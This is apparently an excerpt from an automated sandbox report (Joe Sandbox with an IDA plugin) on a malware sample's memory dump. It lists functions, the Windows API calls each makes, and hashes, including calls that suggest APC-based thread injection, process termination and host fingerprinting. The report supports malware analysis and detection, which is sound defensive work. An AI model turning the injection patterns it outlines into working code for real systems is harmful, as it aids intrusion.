Part of subcall function 0303E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
Part of subcall function 0303E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
Part of subcall function 0303E52A: lstrcpy.KERNEL32(00000000), ref: 0303E59E

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$FreeHeapInterlockedTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemTempThreadlstrlen
String ID:
API String ID: 802748518-0
Opcode ID: b8bf5a58d412fed8a5f26770dafd460d8336b7129fdc18f14b5b60ff71a301ab
Instruction ID: f2898e0b7535a5bfb48a17ea631efc2cbca1b7f43ed80ff98ccaca285969d464
Opcode Fuzzy Hash: b8bf5a58d412fed8a5f26770dafd460d8336b7129fdc18f14b5b60ff71a301ab
Instruction Fuzzy Hash: 113112BA902228FBCB61EFA4D944AADBBBCEF86740F148465F9059B140D7748B41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03025541 Relevance: 10.6, APIs: 7, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303592E: RtlEnterCriticalSection.NTDLL(03048448), ref: 03035936
Part of subcall function 0303592E: RtlLeaveCriticalSection.NTDLL(03048448), ref: 0303594B
Part of subcall function 0303592E: InterlockedIncrement.KERNEL32(0000001C), ref: 03035964

lstrlen.KERNEL32(00000008,?,?,?,0303DFBE,00000000,00000000,-00000008), ref: 030255A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,0303DFBE,00000000,00000000,-00000008), ref: 030255C3
memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0303DFBE,00000000,00000000,-00000008), ref: 030255D5
lstrcpy.KERNEL32(00000020), ref: 03025607
RtlEnterCriticalSection.NTDLL(03048448), ref: 03025613
RtlLeaveCriticalSection.NTDLL(03048448), ref: 0302566B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeapIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 38435513-0
Opcode ID: 48f91acf35a456983ac77364dfa5208fb5c7eb95056451990d13dd3e4a30c018
Instruction ID: ffe558ce867a13d9cc49fb59ac9d8b1e86e188d70a1d13339e6fcf3a8a700504
Opcode Fuzzy Hash: 48f91acf35a456983ac77364dfa5208fb5c7eb95056451990d13dd3e4a30c018
Instruction Fuzzy Hash: 334197B8502715EFCB21EF64ED48B5ABBF8FB49314F108919E84497200D735AA50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03038664 Relevance: 10.6, APIs: 7, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 030386B5
memset.NTDLL ref: 030386D2
WaitForSingleObject.KERNEL32(00000000), ref: 030386EE
GetDriveTypeW.KERNEL32(?), ref: 030386FC
lstrlenW.KERNEL32(?), ref: 03038708
lstrlenW.KERNEL32(?), ref: 03038734
HeapFree.KERNEL32(00000000,?), ref: 0303874D

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heaplstrlen$AllocateDriveFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 855039025-0
Opcode ID: ed4c8fb967f9cbbea25329a5c064c8b982d6d4a70f189bc7631e992750bbf34a
Instruction ID: e023c7abe9712a59e86b6c47a7481447139113218d1b07ed8b5c81f610f47ca7
Opcode Fuzzy Hash: ed4c8fb967f9cbbea25329a5c064c8b982d6d4a70f189bc7631e992750bbf34a
Instruction Fuzzy Hash: 723109BA80211CBFDB11EBA4ED84CEEBBBDEF49354B1084A6F501A2110D735AF559B60

Uniqueness

Uniqueness Score: -1.00%

Function 03025697 Relevance: 10.6, APIs: 7, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000080,00000000), ref: 030256E1
WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 03025706
SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 03025751
WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 03025766
SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 03025773
GetLastError.KERNEL32(?,00000080,00000000), ref: 0302577F
CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0302578B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$ErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2772011183-0
Opcode ID: 2549fb3b179efcde3161de7bdc5a71c5ee7c1297294b6bf15e6725774d26449c
Instruction ID: 06358be458d0ef29c946184ece9d30cf0e94b5f164466f2935d7cc532eafddd4
Opcode Fuzzy Hash: 2549fb3b179efcde3161de7bdc5a71c5ee7c1297294b6bf15e6725774d26449c
Instruction Fuzzy Hash: 1931C275942218FFEB20DFA4ED4ABAEBFB8EF05325F144190F950A60D0C3744AA4DB54

Uniqueness

Uniqueness Score: -1.00%

Function 03022C75 Relevance: 10.6, APIs: 7, Instructions: 87registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,03044018,?), ref: 03022C90
RegCloseKey.ADVAPI32(?), ref: 03022D48

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

LoadLibraryA.KERNEL32(00000000), ref: 03022CDE
GetProcAddress.KERNEL32(00000000,?), ref: 03022CF7
GetLastError.KERNEL32 ref: 03022D16
FreeLibrary.KERNEL32(00000000), ref: 03022D28
GetLastError.KERNEL32 ref: 03022D30

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID:
API String ID: 1628847533-0
Opcode ID: a9571a9603b6dc0f608dc7a3988f3140a2c28625812a898204df3820f9d61f30
Instruction ID: ed19353dd4e77fdc3ba9e8c0f2383697d2440f7960d7633ce0bc7613f5abeaa4
Opcode Fuzzy Hash: a9571a9603b6dc0f608dc7a3988f3140a2c28625812a898204df3820f9d61f30
Instruction Fuzzy Hash: A12186B9942228FFCB91FBE8DD48DAEBFBCEB84610B1409A5F911A6114E7314F10CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03034A70 Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303E52A: GetCurrentThreadId.KERNEL32 ref: 0303E562
Part of subcall function 0303E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
Part of subcall function 0303E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
Part of subcall function 0303E52A: lstrcpy.KERNEL32(00000000), ref: 0303E59E

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,?,00000000,?,?,0302A242,00000000,00000000,00000004), ref: 03034AB1
HeapFree.KERNEL32(00000000,00000000,00001ED2,?,00000000,?,?,0302A242,00000000,00000000,00000004,?,00000000,?,00000000,?), ref: 03034B24

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$Time$CreateCurrentFreeHeapNameSystemTempThreadlstrcpy
String ID:
API String ID: 1158284192-0
Opcode ID: 020936460f73adc8d9042a7cd49d3dd5b46b6fb93c2ddedf98bba03b2a3a3aba
Instruction ID: e23b9da869e952820c8d6186f40412a7356cebcd91a4bd3c31a9edfd7971cccc
Opcode Fuzzy Hash: 020936460f73adc8d9042a7cd49d3dd5b46b6fb93c2ddedf98bba03b2a3a3aba
Instruction Fuzzy Hash: E6113179203324BBD331BA72AC8DF6F7F9CEB46760F000B11F64199080D7769A24C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0303FD17 Relevance: 10.6, APIs: 7, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0303FD49
GetModuleHandleA.KERNEL32(?,06092317,00000004,00000000,?,00000000,00000000), ref: 0303FD69
GetProcAddress.KERNEL32(00000000), ref: 0303FD70
Thread32First.KERNEL32(00000000,0000001C), ref: 0303FD80
OpenThread.KERNEL32(001F03FF,00000000,00000000,00000000,0000001C), ref: 0303FD9B
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0303FDAC
Thread32Next.KERNEL32(00000000,0000001C), ref: 0303FDBC

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Thread32$AddressCreateFirstHandleModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 190292596-0
Opcode ID: b2b1d628447537a3e717a0f801fcd449adbbfe0feb7405ea785e366e8896f3c2
Instruction ID: e11ae7c80073617a90a9c9335394efc68d4f91397cb711ce5aaa8900530b31ad
Opcode Fuzzy Hash: b2b1d628447537a3e717a0f801fcd449adbbfe0feb7405ea785e366e8896f3c2
Instruction Fuzzy Hash: 64219DB6901119AFDF00EFE4DC88DFEBBBDEB49350B04452AFA00A6164D7349A558B60

Uniqueness

Uniqueness Score: -1.00%

Function 03021000 Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03021031
wcstombs.NTDLL ref: 03021042
OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 03021063
TerminateProcess.KERNEL32(00000000,00000000), ref: 03021072
CloseHandle.KERNEL32(00000000), ref: 03021079
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03021088
WaitForSingleObject.KERNEL32(00000000), ref: 03021098

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 77b67c259790374defcdfcb02c9482c199eb4cfa465870bce6f275b111e3b39d
Instruction ID: da9601cc86b5f58e44648c7ae5dc4086a9e8f89fc942ea5158f0ae29b8104067
Opcode Fuzzy Hash: 77b67c259790374defcdfcb02c9482c199eb4cfa465870bce6f275b111e3b39d
Instruction Fuzzy Hash: 8C112B79102215FBE760AF65DE99FAABBA8FF00740F144050F90491184C7F9EA60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303875D Relevance: 10.6, APIs: 7, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,0303EDFC), ref: 03038772

Part of subcall function 03033F46: InterlockedExchange.KERNEL32(?,000000FF), ref: 03033F4D

WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,0303EDFC), ref: 03038792
RtlEnterCriticalSection.NTDLL(?), ref: 030387AD
RtlLeaveCriticalSection.NTDLL(?), ref: 030387C5
Sleep.KERNEL32(000001F4), ref: 030387D4
LocalFree.KERNEL32(?), ref: 030387EC
RtlDeleteCriticalSection.NTDLL(?), ref: 030387F6

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 3004309391-0
Opcode ID: 0f3a601875cafd89535f42fb36712f067c2e6702a384a9f0544528ffb6a2fb9d
Instruction ID: a747d93510532389c7de074ae1262ad8c78f3cf8e2188de8d8f1fe7ec1947582
Opcode Fuzzy Hash: 0f3a601875cafd89535f42fb36712f067c2e6702a384a9f0544528ffb6a2fb9d
Instruction Fuzzy Hash: 081191B9102726AFC720AB75DD8895BB7FEFF057007148994F28293554CB39E918CB10

Uniqueness

Uniqueness Score: -1.00%

Function 03036BF0 Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

GetLastError.KERNEL32(?,?,?,00001000,?,03048314,03043054), ref: 03036C71
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,03048314,03043054), ref: 03036CF6
CloseHandle.KERNEL32(00000000,?,03048314,03043054), ref: 03036D10
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,03048314,03043054), ref: 03036D45

Part of subcall function 0302BB52: RtlReAllocateHeap.NTDLL(00000000,?,?,03029236), ref: 0302BB62

WaitForSingleObject.KERNEL32(?,00000064,?,03048314,03043054), ref: 03036DC7
CloseHandle.KERNEL32(F0FFC983,?,03048314,03043054), ref: 03036DEE

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 5e74e4b0ca4a61f6ed4229bf415fc026068ff283ba160070787e31db631e4afe
Instruction ID: c823e5123b10ca321025941de63915d0f049cb1939478352f84a0d8f9811bd8d
Opcode Fuzzy Hash: 5e74e4b0ca4a61f6ed4229bf415fc026068ff283ba160070787e31db631e4afe
Instruction Fuzzy Hash: 87813875D02219EFCB11DF98C984AADFBB9FF09700F148459E945BB250C732AA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03027A01 Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 03027A1A

Part of subcall function 03035AE2: RtlAllocateHeap.NTDLL(00000000,?), ref: 03035B20
Part of subcall function 03035AE2: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,03035859,00000020), ref: 03035B3D
Part of subcall function 03035AE2: HeapFree.KERNEL32(00000000,00000000,?,?,03035859,00000020), ref: 03035B5D

RtlEnterCriticalSection.NTDLL(03048088), ref: 03027A52
CloseHandle.KERNEL32(00000000), ref: 03027A60
HeapFree.KERNEL32(00000000,?,?,00000001,00001000), ref: 03027B39
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03027B48
HeapFree.KERNEL32(00000000,00000000,00001000), ref: 03027B5B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$CriticalSection$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID:
API String ID: 1558671577-0
Opcode ID: 9a4f1552b82674fb2a91b3fc8e615bfb974d5b05c07fe4ef3562454d982e361b
Instruction ID: 945ddd893ac4ad41e512f25b61330b8826a6c077cc51139aacd83a9288251d1b
Opcode Fuzzy Hash: 9a4f1552b82674fb2a91b3fc8e615bfb974d5b05c07fe4ef3562454d982e361b
Instruction Fuzzy Hash: B941E279603225ABDB62EF94C984FAABFBDFB84B00F144465F90497215DB319B41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0303DA21 Relevance: 9.1, APIs: 6, Instructions: 123threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0303DA44

Part of subcall function 0303BB46: GetModuleHandleA.KERNEL32(?,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BB67
Part of subcall function 0303BB46: GetProcAddress.KERNEL32(00000000,?), ref: 0303BB80
Part of subcall function 0303BB46: OpenProcess.KERNEL32(00000400,00000000,0303DA64,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BB9D
Part of subcall function 0303BB46: IsWow64Process.KERNEL32(00000000,00000000,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BBAE
Part of subcall function 0303BB46: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BBC1

ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,03048190,?,00000000), ref: 0303DAFD
WaitForSingleObject.KERNEL32(00000064), ref: 0303DB0B
SuspendThread.KERNEL32(?), ref: 0303DB1E

Part of subcall function 0302DE3C: memset.NTDLL ref: 0302E0E9

ResumeThread.KERNEL32(?), ref: 0303DBA0

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 2397206891-0
Opcode ID: bfa914591176f6a7d2df5284095bbe5ff5c6a6d029199a2a4dea219400c88a55
Instruction ID: c670759449878eb6eb0cb1daee2665e004e9dd37c068e65a0522db157a3ba237
Opcode Fuzzy Hash: bfa914591176f6a7d2df5284095bbe5ff5c6a6d029199a2a4dea219400c88a55
Instruction Fuzzy Hash: 34419D76902249EFDF61EF98CD84AEEBBFDAF45300F0848A5E915AB150C735DA51CB10

Uniqueness

Uniqueness Score: -1.00%

Function 03030098 Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?), ref: 030300F3
GetLastError.KERNEL32 ref: 03030119
SetEvent.KERNEL32(00000000), ref: 0303012C
GetModuleHandleA.KERNEL32(00000000), ref: 03030175
memset.NTDLL ref: 0303018A
RtlExitUserThread.NTDLL(?), ref: 030301BF

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: HandleModule$ErrorEventExitLastThreadUsermemset
String ID:
API String ID: 3978817377-0
Opcode ID: 07221fccd8b54502730becb3457f0ece03f2c457a968fafaa71cc4b3eb44140b
Instruction ID: 222c58e9917ec1121a88e9af9ced1de580eea4b3c5b9ffbc200610468bb9d993
Opcode Fuzzy Hash: 07221fccd8b54502730becb3457f0ece03f2c457a968fafaa71cc4b3eb44140b
Instruction Fuzzy Hash: 524162B5902604AFCB60DFA8DD888AEFBFDFB866107644A59E947D2104D7359E04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303ECC1 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e139d63674191bd7d96782acac9ee01daa2be17f182804861f2eaa9ecc900130
Instruction ID: a6cf62032b3cfd1f8dc7877a99c27d7eee948ede139f46dc3da9c33d484bb803
Opcode Fuzzy Hash: e139d63674191bd7d96782acac9ee01daa2be17f182804861f2eaa9ecc900130
Instruction Fuzzy Hash: 9E41B4B65027119FC720EF75DC89A6BBBECFB86725B044B2DF5A6C6180D7709901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302B614 Relevance: 9.1, APIs: 6, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0302B6C9
memcpy.NTDLL(00000000,00000002,?), ref: 0302B6DA
memcpy.NTDLL(00000000,?,?), ref: 0302B6F0
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0302B702
memcpy.NTDLL(00000000,030433F8,00000002,00000000,?,?,00000000,?,?), ref: 0302B715
memcpy.NTDLL(00000000,?,00000002), ref: 0302B72A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memcpy$AllocateHeap
String ID:
API String ID: 4068229299-0
Opcode ID: 19442ecbce1ef7ab042c9fd5810eae523a21bdab754ba42ada0f8cacb0dd4ec8
Instruction ID: d3c3664962c0aa1e391a0345532f5579986449617934a0d6d53d1a2115604c71
Opcode Fuzzy Hash: 19442ecbce1ef7ab042c9fd5810eae523a21bdab754ba42ada0f8cacb0dd4ec8
Instruction Fuzzy Hash: 42414C76D0121AEFCF01DFA8DC8499EBBB8EF48218F144456E914A7211E735EA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 030304F5 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,80000000,?,?,030440C0,00000018,0303CD58,?,00000201,03047A34,030479E8,-0000000C,?), ref: 03030538
VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,03043050,?,?,80000000,?,?,030440C0,00000018,0303CD58), ref: 030305C3
RtlEnterCriticalSection.NTDLL(03048420), ref: 030305EC
RtlLeaveCriticalSection.NTDLL(03048420), ref: 0303060A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 65d1758c8cb669a04ab4e44098424c67adfb1c5f372e7b9b7ab5d0a3946b6b59
Instruction ID: 7fd6ff226278960ed4ce6e62255ac8e3b1155424ff81ae23d2b7bee54b17afcc
Opcode Fuzzy Hash: 65d1758c8cb669a04ab4e44098424c67adfb1c5f372e7b9b7ab5d0a3946b6b59
Instruction Fuzzy Hash: 7F4183B8902705EFCB11DF65C984A9EBBF8FF8A300B108569E556DB214D774DA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303B568 Relevance: 9.1, APIs: 6, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B5A5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0303332D), ref: 0303B5DB
GetComputerNameW.KERNEL32(00000000,?), ref: 0303B5E9
RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B600
GetComputerNameW.KERNEL32(00000000,?), ref: 0303B611
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0303332D), ref: 0303B637

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateComputerFreeName
String ID:
API String ID: 3439771632-0
Opcode ID: b866bd320f10e63787c3464b46529268bad0696a04e882b50977aedd01c1ac72
Instruction ID: 8bf37ae19b36a35570931f472b03fe77b2dddca6645e54f04d8b3bb892e792de
Opcode Fuzzy Hash: b866bd320f10e63787c3464b46529268bad0696a04e882b50977aedd01c1ac72
Instruction Fuzzy Hash: 1E312ABAA02209EFDB10EFB4DD848AEFBFDFB44204B148969E905D3214D734EE509B10

Uniqueness

Uniqueness Score: -1.00%

Function 0303BF9A Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0303BFB4
CreateWaitableTimerA.KERNEL32(03048208,00000003,?), ref: 0303BFD1
GetLastError.KERNEL32(?,?,030385A2,?,?,?,00000000,?,?,?,?,?,?), ref: 0303BFE2

Part of subcall function 0302DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0302DD47
Part of subcall function 0302DCFB: RegCloseKey.KERNELBASE(?,?,?,?,0302508A,?,?,?,?,?,00000001), ref: 0302DD8B

GetSystemTimeAsFileTime.KERNEL32(?,00000000,030385A2,?,?,?,030385A2,?), ref: 0303C022
SetWaitableTimer.KERNEL32(00000000,030385A2,00000000,00000000,00000000,00000000,?,?,030385A2,?), ref: 0303C041
HeapFree.KERNEL32(00000000,030385A2,00000000,030385A2,?,?,?,030385A2,?), ref: 0303C057

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: TimerWaitable$HeapTime$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 3073001550-0
Opcode ID: 6ac0bc277dad4e99fd73205c9a7c9d20e44b3de599249a0a7e7ff0b99fb7eda7
Instruction ID: bf75d979022db25f765b983a4e6d22478c22e23f7f3a8a952097eab4bbd5742b
Opcode Fuzzy Hash: 6ac0bc277dad4e99fd73205c9a7c9d20e44b3de599249a0a7e7ff0b99fb7eda7
Instruction Fuzzy Hash: 36314CB9902288EBDB21EFA9C989CEFBBBDEB86740B148455F545F6100D3349A50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0302F52B Relevance: 9.1, APIs: 6, Instructions: 82memoryfilestringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0302F56A
lstrcpyW.KERNEL32(00000000,?), ref: 0302F57B
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,030246EB,?,?,?), ref: 0302F592
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,030246EB,?,?,?), ref: 0302F5AC
CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,030246EB,?,?,?), ref: 0302F5DC
HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,030246EB,?,?,?), ref: 0302F5EA

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID:
API String ID: 2686460493-0
Opcode ID: 499d7ad21f868dcf865372576de0d32c0e1d65ef325352b10c0f68270b25bfac
Instruction ID: 5a1929c22712481e96da9e45175b0b0b893204943c616361d83f2bfb6785047d
Opcode Fuzzy Hash: 499d7ad21f868dcf865372576de0d32c0e1d65ef325352b10c0f68270b25bfac
Instruction Fuzzy Hash: FA21237A102325BFD322AF24DC44F3FBBFCEF85B80F14065AF64182154CB249A118B64

Uniqueness

Uniqueness Score: -1.00%

Function 0303D2DA Relevance: 9.1, APIs: 6, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0303D2E6
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0303D2FC
CreateFileMappingW.KERNEL32(000000FF,03048208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0303D33D
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0303D366
CloseHandle.KERNEL32(00000000), ref: 0303D387
GetLastError.KERNEL32 ref: 0303D38F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView_aulldiv
String ID:
API String ID: 1732207917-0
Opcode ID: 4d8c9e914136b7879d720822464aaaae4306cc0a8e1b4242f3c42b65097e3299
Instruction ID: d7174749390a7224fc3e71f09a58171cf0a7e7c403c7dfa0fcca72e94682cf71
Opcode Fuzzy Hash: 4d8c9e914136b7879d720822464aaaae4306cc0a8e1b4242f3c42b65097e3299
Instruction Fuzzy Hash: AF2102FA642208BBC721EB68DD05F9E77BDAB86740F240160F605EB2C4D770DA148B54

Uniqueness

Uniqueness Score: -1.00%

Function 0302CE1C Relevance: 9.1, APIs: 6, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

